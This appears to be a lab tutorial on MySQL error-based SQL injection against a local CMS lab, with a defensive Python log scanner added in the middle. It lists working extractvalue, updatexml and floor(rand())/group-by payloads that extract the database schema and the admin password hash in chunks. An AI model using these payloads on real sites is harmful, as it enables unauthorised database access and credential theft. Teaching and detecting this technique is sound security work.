Error injection
While testing the injection point, you find that the page displays the database's own error message for the failed SQL statement, so the error output can be used as the channel for injection.
The principle of error-based injection is to have the result of a SQL sub-query echoed back inside the error message. There are many ways to trigger such an error, and the details differ by function; here it is recommended to memorise the templates below directly and substitute one of them for the 1=1 part of a boolean test.
Common method
group by
?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit 0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
extractvalue
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))
updatexml
?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)
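As a defender's counterpart to the payload templates above, here is an added example (not part of the original article) that scans web-server access-log lines for the extractvalue, updatexml and floor(rand())/group by signatures, undoing repeated percent-encoding first. The log lines and the /cms/cms/show.php path are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Signatures of the MySQL error-based techniques shown above; matched
# case-insensitively against every decoded query-string value.
SIGNATURES = {
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "floor-rand-groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S),
}

# Combined access-log format: only the request target is needed here.
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

def decode_params(target: str) -> dict:
    """Query parameters of a request target, percent-decoded repeatedly so
    that double-encoded payloads (%2528 -> %28 -> '(') are normalised too."""
    params = {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        prev = None
        while prev != value:          # decode until a fixed point is reached
            prev, value = value, unquote_plus(value)
        params[key] = value
    return params

def classify_request(target: str) -> list:
    """Names of the error-based signatures present in a request target."""
    values = list(decode_params(target).values())
    return [name for name, pat in SIGNATURES.items()
            if any(pat.search(v) for v in values)]

def scan_log(lines):
    """Yield (request target, matched signatures) for each suspicious line."""
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            hits = classify_request(m.group(1))
            if hits:
                yield m.group(1), hits

# Constructed sample log lines (not captured from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [t] "GET /cms/cms/show.php?id=33 HTTP/1.1" 200 512',
    '10.0.0.9 - - [t] "GET /cms/cms/show.php?id=33%20and%20updatexml(1,concat(0x5e,(select%20database()),0x5e),1) HTTP/1.1" 500 120',
    '10.0.0.9 - - [t] "GET /cms/cms/show.php?id=33+and+extractvalue%25281%252Cconcat%25280x5e%252Cdatabase%2528%2529%2529%2529 HTTP/1.1" 500 118',
]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print(hits, target)
```

A 500 response paired with one of these signatures is a strong sign that the database error text is reaching the client, which is the precondition the technique depends on.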
Case environment
PHP environment: phpstudy20261103.exe
Lab: cms
Download address: https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
Extraction code: jap0
Goal: obtain the password of the website back-end administrator account.
The SQL-injectable address in the cms lab: http://localhost/cms/cms/show.php?id=33
Note: the string that concat() can return inside the error message is limited to 31 characters, so substr() is used to cut the result into pieces, and the whole value is recovered by shifting the start offset of each piece.
Query the database name
?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
or
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
Query the tables
-- characters 1 to 31
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),1,31) from information_schema.tables where table_schema = database()),0x5e))
-- characters 31 to 61
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),31,61) from information_schema.tables where table_schema = database()),0x5e))
Query the columns
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(column_name),1,31) from information_schema.COLUMNS where table_schema = database() and table_name = "cms_users"),0x5e))
Query the data (password)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)
Password characters 1-16:
e10adc3949ba59ab
Password characters 17-32:
be56e057f20f883e
Concatenated password: e10adc3949ba59abbe56e057f20f883e
cmd5 decryption: